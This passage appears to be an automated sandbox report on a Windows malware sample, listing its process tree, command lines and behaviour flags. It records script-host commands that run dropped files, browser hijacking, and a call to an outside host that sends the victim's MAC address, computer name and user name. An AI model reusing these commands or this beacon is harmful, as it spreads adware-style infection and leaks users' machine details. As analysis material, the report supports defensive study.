        - Runs .reg file with regedit
        PID: 4644

    C:\Windows\SysWOW64\Cmd.exe
    Cmd.exe /c CScript /nologo "C:\Windows\inf\pack.wsf" "C:\Windows\inf\1_yewnsemla.wzyxk" >> "C:\Windows\inf\yewnsemla.wzyxk"
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID: 4264

        C:\Windows\SysWOW64\cscript.exe
        CScript /nologo "C:\Windows\inf\pack.wsf" "C:\Windows\inf\1_yewnsemla.wzyxk"
        PID: 3060

    C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\SysWow64\WScript.exe" "C:\Windows\inf\yewnsemla.wzyxk"
    - Checks computer location settings
    - Modifies Internet Explorer settings
    - Modifies Internet Explorer start page
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID: 4840

        C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://www.5136688.com/?8
        - Modifies Internet Explorer settings
        - Suspicious behavior: GetForegroundWindowSpam
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        PID: 1860

            C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1860 CREDAT:17410 /prefetch:2
            - Modifies Internet Explorer settings
            - Suspicious use of SetWindowsHookEx
            PID: 2632

            C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1860 CREDAT:82948 /prefetch:2
            - Modifies Internet Explorer settings
            - Suspicious use of SetWindowsHookEx
            PID: 5080

    C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://u.5136688.com/setuptj.asp?a_ip=&a_mac=D2:D0:01:7C:86:29&a_cpname=GBQHURCC&a_user=me&a_locip=0.0.0.0
    - Modifies Internet Explorer settings
    PID: 3692

    \??\c:\windows\SysWOW64\wscript.exe
    c:\windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\Killme.vbs
    PID: 2804
Network
MITRE ATT&CK Enterprise v6
Downloads